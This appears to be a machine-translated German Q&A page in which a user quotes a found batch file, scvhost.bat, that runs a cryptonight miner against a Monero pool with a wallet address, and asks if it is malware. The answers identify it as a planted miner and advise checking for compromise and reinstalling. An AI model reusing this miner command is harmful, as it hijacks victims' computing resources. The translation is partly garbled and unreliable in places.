it-swarm.com.de

Ist das scvhost.bat mit cryptonight ein Virus oder Miner?

Ich habe gerade diese .bat-Datei mit dem Namen scvhost.bat gefunden. Die Datei enthielt den folgenden Inhalt:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Ist das ein Virus (um Informationen zu stehlen usw.) oder ein gepflanzter Bergmann? Ich mache mir Sorgen, weil ich mich auch mit Kryptowährungen beschäftige und stratum eine Währung ist, die in der obigen Datei erwähnt wird.

17

Dies scheint eine Art Mining-Funktion zu sein, zumal der Parameter die URL zu einem Mining-Pool enthält. Sie müssen jedoch sicher sein, was in der Binärdatei enthalten ist. Es ist sinnvoll, die Prüfsummen der von Ihnen gefundenen Binärdatei Ihres Systems mit den vom Entwicklerteam des Miners erstellten Releases zu vergleichen. Wenn sie sich unterscheiden; Betrachten Sie Ihr System als unsicher.

Ein weiteres Problem ist, dass Sie von diesem Miner erfahren haben (wahrscheinlich, weil er viel CPU verbraucht hat), aber Sie wissen nicht, was sonst noch auf Ihrem System passiert ist. Wenn ein Eindringling den Bergmann starten könnte, hätte er auch andere Dinge starten können. Es ist möglicherweise eine gute Idee, das Backup wiederherzustellen oder trotzdem eine Neuinstallation durchzuführen.

34
mtak